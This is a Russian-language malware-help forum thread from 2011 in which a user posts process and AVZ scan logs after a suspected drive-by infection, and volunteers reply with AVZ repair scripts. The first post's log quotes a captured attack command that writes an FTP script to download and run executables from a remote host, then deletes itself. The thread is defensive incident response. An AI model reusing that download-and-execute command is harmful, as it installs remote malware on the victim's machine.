Показано с 1 по 5 из 5.

Помогите найти дыру в системе (заявка № 107989)

  1. #1
    Junior Member Репутация
    Регистрация
    28.08.2011
    Сообщений
    2
    Вес репутации
    24

    Помогите найти дыру в системе

    Примерно неделю назад я был заражен вирусом. Он пришел на компьютер сам (я ничего не запускал). Видимо, виной дыра в системе или ПО. После этого систему переустановил. Сегодня снова обнаружил атаку на мой PC но вовремя предотвратил заражение. Помогите найти и залатать дыру в моей системе.

    Вот все сведения, которыми я располагаю:
    Сегодня 2011.08.28
    Время 00 часов 30 минут
    Операционка WinXP SP3 (заплатки примерно за Июнь 2011)

    Во время обнаружения атаки работали приложения:
    Denwer-3 (версия 2008-01-13) <-- (думаю в нем вся проблемма)
    Winword (Portable MS Office 2003 SP2 RUS)
    HandyCache
    Notepad++
    AnVir Task Manager
    PrivateFierwall
    Avast! Free
    ...Ну и некоторые другие по мелочи, к ним минимум подозрения.

    Вырезка из лога AnVir Task Manager:
    08/28 00:16:10 wmiprvse.exe 3272 started by svchost.exe C:\WINDOWS\system32\wbem\wmiprvse.exe (предполагаю что запустила служба "Запуск серверных процессов DCOM")
    08/28 00:16:38 wmiprvse.exe 1740 started by svchost.exe NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
    08/28 00:16:38 msiexec.exe 1080 started by services.exe NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe /V
    08/28 00:17:46 cmd.exe 3432 started by wmiprvse.exe COMP\admin C:\WINDOWS\system32\cmd.exe /d /c md i2393&cd i2393&del *.* /f /s /q&echo open yBBDD.to.jajaca.com >j&echo Wmi >>j&echo 123 >>j&echo mget *.exe >>j&echo bye >>j&FTP.EXE -i -s:j&del j&echo for %%i in (*.exe) do start %%i >D.bat&echo for %%i in (*.exe) do %%i >>D.bat&echo del /f /q %0% >>D.bat&D.bat
    08/28 00:17:46 ftp.exe 2844 started by cmd.exe COMP\admin C:\WINDOWS\system32\ftp.exe -i -s:j
    (Широко раскрыв рот на жалобы фаерволла о запуск ftp.exe прибиваю его и выдергиваю 3G модем из разьема)
    08/28 00:18:16 cmd.exe 3432 terminated, worked 0:29, CPU 0:00 C:\WINDOWS\system32\cmd.exe
    08/28 00:18:16 ftp.exe 2844 terminated, worked 0:29, CPU 0:00 C:\WINDOWS\system32\ftp.exe
    08/28 00:18:56 wmiprvse.exe 3272 terminated, worked 2:45, CPU 0:00 C:\WINDOWS\system32\wbem\wmiprvse.exe


    Лог (строки, которые могут представить интерес) Ревизора AVZ
    c:\windows\Installer\$PatchCache$\Managed\4c7bb632 9144df244090e152a7523ed4 = Каталог создан (там файлы 2 дневной давности, видимо не связаны с вирусом и остались от установки vcredist)
    c:\windows\system32\appmgmt = Каталог создан (создан за четыре дня до сегоня)
    c:\windows\system32\aswboot.exe = Файл создан (дата создания - больше месяца назад! у меня операционка неделю назад только поставлена была)
    c:\windows\system32\config\systemprofile\Applicati on Data\Microsoft\cryptneturlcache = Каталог создан
    c:\windows\system32\drivers\aswmon.sys = Файл создан
    c:\windows\system32\drivers\inspect.sys = Файл удален
    c:\windows\system32\i2393 = Каталог создан (эту папку создал командный файл при атаке)
    c:\windows\system32\Macromed\Flash\flashutil10t_pl ugin.exe = Файл создан
    c:\windows\system32\sscprot.dll = Файл создан (дата создания - 2008 год )
    c:\windows\LastGood = Каталог удален



    Лог проверки AVZ:
    Код:
    Протокол антивирусной утилиты AVZ версии 4.35
    Сканирование запущено в 28.08.2011 02:01:24
    Загружена база: сигнатуры - 293482, нейропрофили - 2, микропрограммы лечения - 56, база от 20.08.2011 04:00
    Загружены микропрограммы эвристики: 388
    Загружены микропрограммы ИПУ: 9
    Загружены цифровые подписи системных файлов: 290795
    Режим эвристического анализатора: Средний уровень эвристики
    Режим лечения: выключено
    Версия Windows: 5.1.2600, Service Pack 3 ; AVZ работает с правами администратора
    Восстановление системы: Отключено
    1. Поиск RootKit и программ, перехватывающих функции API
    1.1 Поиск перехватчиков API, работающих в UserMode
     Анализ kernel32.dll, таблица экспорта найдена в секции .text
     Анализ ntdll.dll, таблица экспорта найдена в секции .text
     Анализ user32.dll, таблица экспорта найдена в секции .text
     Анализ advapi32.dll, таблица экспорта найдена в секции .text
     Анализ ws2_32.dll, таблица экспорта найдена в секции .text
     Анализ wininet.dll, таблица экспорта найдена в секции .text
     Анализ rasapi32.dll, таблица экспорта найдена в секции .text
     Анализ urlmon.dll, таблица экспорта найдена в секции .text
     Анализ netapi32.dll, таблица экспорта найдена в секции .text
    1.2 Поиск перехватчиков API, работающих в KernelMode
     Драйвер успешно загружен
     SDT найдена (RVA=085700)
     Ядро ntkrnlpa.exe обнаружено в памяти по адресу 804D7000
       SDT = 8055C700
       KiST = 80504480 (284)
    Функция NtAddBootEntry (09) перехвачена (80616A60->F38EA202), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtAdjustPrivilegesToken (0B) перехвачена (805EC494->F6607D30), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtAllocateVirtualMemory (11) перехвачена (805A8AE6->F3978D8C), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Функция NtClose (19) перехвачена (805BC55C->F390E6C1), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtConnectPort (1F) перехвачена (805A45FC->F6609AA0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateEvent (23) перехвачена (8060EF7E->F38EC7F0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateEventPair (24) перехвачена (806172D6->F38EC848), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateFile (25) перехвачена (805790A8->F6608D70), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateIoCompletion (26) перехвачена (80578A86->F38EC95E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateKey (29) перехвачена (80624120->F390E075), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateMutant (2B) перехвачена (806176CE->F38EC746), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreatePort (2E) перехвачена (805A5118->F6609DE0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateProcessEx (30) перехвачена (805D11AA->F660A8D0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateSection (32) перехвачена (805AB3F4->F38EC898), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateSemaphore (33) перехвачена (8061507E->F38EC79A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtCreateSymbolicLinkObject (34) перехвачена (805C3A26->F6609290), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateThread (35) перехвачена (805D1048->F660A4D0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtCreateTimer (36) перехвачена (80616F9E->F38EC90C), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtDebugActiveProcess (39) перехвачена (80643B60->F6607490), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtDeleteBootEntry (3D) перехвачена (80616A52->F38EA226), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtDeleteKey (3F) перехвачена (806245BC->F390ED87), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtDeleteValueKey (41) перехвачена (8062478C->F390F03D), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtDuplicateObject (44) перехвачена (805BE034->F38ECBE2), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtEnumerateKey (47) перехвачена (8062496C->F390EBF2), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtEnumerateValueKey (49) перехвачена (80624BD6->F390EA5D), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtFreeVirtualMemory (53) перехвачена (805B2FDE->F3978E3C), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Функция NtLoadDriver (61) перехвачена (80584160->F38E9FF0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtModifyBootEntry (6D) перехвачена (80616A52->F38EA24A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtNotifyChangeKey (6F) перехвачена (8062630E->F38ECD56), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtNotifyChangeMultipleKeys (70) перехвачена (80624F42->F38EACDA), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenEvent (72) перехвачена (8060F07E->F38EC820), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenEventPair (73) перехвачена (806173AE->F38EC870), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenFile (74) перехвачена (8057A1A6->F6609040), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtOpenIoCompletion (75) перехвачена (80578B5E->F38EC988), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenKey (77) перехвачена (806254FE->F390E3D1), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenMutant (78) перехвачена (806177A6->F38EC772), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenProcess (7A) перехвачена (805CB470->F38ECA1A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenSection (7D) перехвачена (805AA418->F38EC8D8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenSemaphore (7E) перехвачена (80615178->F38EC7C8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenThread (80) перехвачена (805CB6FC->F38ECAFE), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtOpenTimer (83) перехвачена (806170C0->F38EC936), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtProtectVirtualMemory (89) перехвачена (805B844A->F3978ED4), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Функция NtQueryKey (A0) перехвачена (80625840->F390E8D8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtQueryObject (A3) перехвачена (805C52F8->F38EABA0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtQueryValueKey (B1) перехвачена (80622344->F390E72A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtRenameKey (C0) перехвачена (80623B42->F398110E), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Функция NtRequestPort (C7) - модификация машинного кода. Метод JmpTo. jmp F7ABDCA0
    Функция NtRequestWaitReplyPort (C8) - модификация машинного кода. Метод JmpTo. jmp F7ABDD40
    Функция NtRestoreKey (CC) перехвачена (80625B00->F390D6E8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtResumeThread (CE) перехвачена (805D49EA->F6609540), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtSecureConnectPort (D2) перехвачена (805A3D90->F6609C40), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtSetBootEntryOrder (D3) перехвачена (80616A60->F38EA26E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtSetBootOptions (D4) перехвачена (80616A60->F38EA292), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtSetInformationFile (E0) перехвачена (8057B034->F66093B0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtSetSystemInformation (F0) перехвачена (8060FD36->F38EA04A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtSetSystemPowerState (F1) перехвачена (80653E18->F38EA186), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtSetValueKey (F7) перехвачена (80622692->F390EE8E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtShutdownSystem (F9) перехвачена (80612FC0->F38EA162), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtSystemDebugControl (FF) перехвачена (806180EA->F38EA1AA), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtTerminateProcess (101) перехвачена (805D2A12->F66084F0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtTerminateThread (102) перехвачена (805D2C0C->F6608C50), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
    Функция NtTraceEvent (104) - модификация машинного кода. Метод JmpTo. jmp F7ABDC00
    Функция NtVdmControl (10C) перехвачена (805FBB9C->F38EA2B6), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
    Функция NtRequestPort (805A2A76) - модификация машинного кода. Метод JmpTo. jmp F7ABDCA0 
    Функция NtRequestWaitReplyPort (805A2DA2) - модификация машинного кода. Метод JmpTo. jmp F7ABDD40 
    Функция NtTraceEvent (8053515A) - модификация машинного кода. Метод JmpTo. jmp F7ABDC00 
    Функция ObInsertObject (805C3006) - модификация машинного кода. Метод JmpTo. jmp F398B7F2 \SystemRoot\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Функция ObMakeTemporaryObject (805BC582) - модификация машинного кода. Метод JmpTo. jmp F3989D4C \SystemRoot\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    Проверено функций: 284, перехвачено: 60, восстановлено: 0
    1.3 Проверка IDT и SYSENTER
     Анализ для процессора 1
     Анализ для процессора 2
     Проверка IDT и SYSENTER завершена
    1.4 Поиск маскировки процессов и драйверов
     Проверка не производится, так как не установлен драйвер мониторинга AVZPM
    1.5 Проверка обработчиков IRP
     Драйвер успешно загружен
    \FileSystem\ntfs[IRP_MJ_CREATE] = F398DE88 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\ntfs[IRP_MJ_CLOSE] = F398DEC8 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\ntfs[IRP_MJ_WRITE] = F398DFA4 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\ntfs[IRP_MJ_SET_INFORMATION] = F398DFE4 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\FastFat[IRP_MJ_CREATE] = F398E024 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\FastFat[IRP_MJ_CLOSE] = F398E064 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\FastFat[IRP_MJ_WRITE] = F398E140 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
    \FileSystem\FastFat[IRP_MJ_SET_INFORMATION] = F398E180 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
     Проверка завершена
    2. Проверка памяти
     Количество найденных процессов: 23
     Количество загруженных модулей: 233
    Проверка памяти завершена
    3. Сканирование дисков
    4. Проверка Winsock Layered Service Provider (SPI/LSP)
     Настройки LSP проверены. Ошибок не обнаружено
    5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
    6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
     Проверка отключена пользователем
    7. Эвристичеcкая проверка системы
    Нестандартный ключ Winlogon\Shell: "c:\progra~1\blackbox\blackbox.exe"
    Нестандартный ключ реестра для системной службы: BITS ImagePath=""
    Нестандартный ключ реестра для системной службы: wuauserv ImagePath=""
    Проверка завершена
    8. Поиск потенциальных уязвимостей
    >> Службы: разрешена потенциально опасная служба Schedule (Планировщик заданий)
    >> Службы: разрешена потенциально опасная служба RDSessMgr (Диспетчер сеанса справки для удаленного рабочего стола)
    > Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
    >> Безопасность: к ПК разрешен доступ анонимного пользователя
    >> Безопасность: разрешен автоматический вход в систему
    Проверка завершена
    9. Мастер поиска и устранения проблем
     >>  Модифицирован ключ запуска проводника
     >>  Заблокирована настройка автоматического обновления
     >>  Меню Пуск - заблокированы элементы
     >>  Таймаут завершения служб находится за пределами допустимых значений
     >>  Заблокирован пункт меню Справка и техподдержка
    Проверка завершена
    Просканировано файлов: 256, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
    Сканирование завершено в 28.08.2011 02:01:59
    Сканирование длилось 00:00:37
    Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
    то Вы можете обратиться в систему http://kaspersky-911.ru
    Последний раз редактировалось dem-it; 28.08.2011 в 07:01.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,460
    Вес репутации
    342
    Уважаемый(ая) dem-it, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    04.04.2008
    Сообщений
    5,972
    Вес репутации
    401
    Выполните скрипт в AVZ (AVZ, Меню Файл\Выполнить скрипт. Подробнее...):
    Код:
    var
    i : integer;
    KeyList : TStringList;
    begin
    KeyList := TStringList.Create;
    RegKeyEnumKey('HKLM','SYSTEM', KeyList);
    for i := 0 to KeyList.Count-1 do
    if pos('controlset', LowerCase(KeyList[i])) > 0 then
     begin
     if RegKeyExistsEx('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS') then
      begin
      RegKeyResetSecurity('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS');
      RegKeyStrParamWrite('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS', 'ImagePath', '%SystemRoot%\System32\svchost.exe -k netsvcs');
      AddToLog('Значение параметра ImagePath в разделе реестра HKLM\SYSTEM\'+KeyList[i]+'\Services\BITS исправлено на оригинальное.');
      end;
     if RegKeyExistsEx('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv') then
      begin
      RegKeyResetSecurity('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv');
      RegKeyStrParamWrite('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv', 'ImagePath', '%SystemRoot%\System32\svchost.exe -k netsvcs');
      AddToLog('Значение параметра ImagePath в разделе реестра HKLM\SYSTEM\'+KeyList[i]+'\Services\wuauserv исправлено на оригинальное.');
      end;
     end;
    KeyList.Free;
    SaveLog(GetAVZDirectory + 'fystemRoot.log');
    end.
    Затем следующий
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(true);
    QuarantineFile('c:\progra~1\blackbox\blackbox.exe','');               
    BC_ImportALL;
    Executerepair(6);
    Executerepair(16);
    RegKeyIntParamWrite('HKLM', 'SYSTEM\CurrentControlSet\Control', 'WaitToKillServiceTimeout', 20000);',' ');  
    RegKeyIntParamWrite('HKLM', 'SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum', '{BDEADF00-C265-11D0-BCED-00A0C90AB50F}', 1);  
     ExecuteWizard('TSW', 2, 2, true);  
    BC_Activate;
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.
    закачайте карантин по ссылке Прислать запрошенный карантин в шапке Вашей темы (Приложение 3 правил).
    Обновите базу АВЗ!
    Выполните действия, описанные в п. 1 - 3 Диагностики и логи прикрепите к новому сообщению.

  5. #4
    Junior Member Репутация
    Регистрация
    28.08.2011
    Сообщений
    2
    Вес репутации
    24
    Во втором скрипте была ошибка, пофиксил, скрипт выполнился.
    BlackBox - это нормальная open sources прога заменяющая explorer (оболочка рабочего стола). Размер файла совпадает с оригинальным в дистрибутиве. Программой пользуюсь не один год, работает с минимумом плагинов, к сети доступа не требует, к ней никаких подозрений. Поэтому после перезагрузки компьютера я снова поставил её в качестве Winlogon\Shell.
    Службу "Запуск серверных процессов DCOM" отключил сразу после подозрений на "соучастие".
    Вложения Вложения
    • Тип файла: zip pack.zip (153.7 Кб, 1 просмотров)

  6. #5
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    953

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 3
    • В ходе лечения вредоносные программы в карантинах не обнаружены


  • Уважаемый(ая) dem-it, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 2
      Последнее сообщение: 22.06.2011, 20:52
    2. Ответов: 6
      Последнее сообщение: 05.04.2011, 12:22
    3. Помогите найти причину..
      От olnmamaluga в разделе Помогите!
      Ответов: 29
      Последнее сообщение: 31.05.2010, 09:41
    4. Как найти свою тему? Найти заявку на лечение.
      От Ru-d-ik в разделе Технические и иные вопросы
      Ответов: 3
      Последнее сообщение: 25.02.2010, 06:19
    5. Ответов: 11
      Последнее сообщение: 03.11.2008, 16:59

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00130 seconds with 17 queries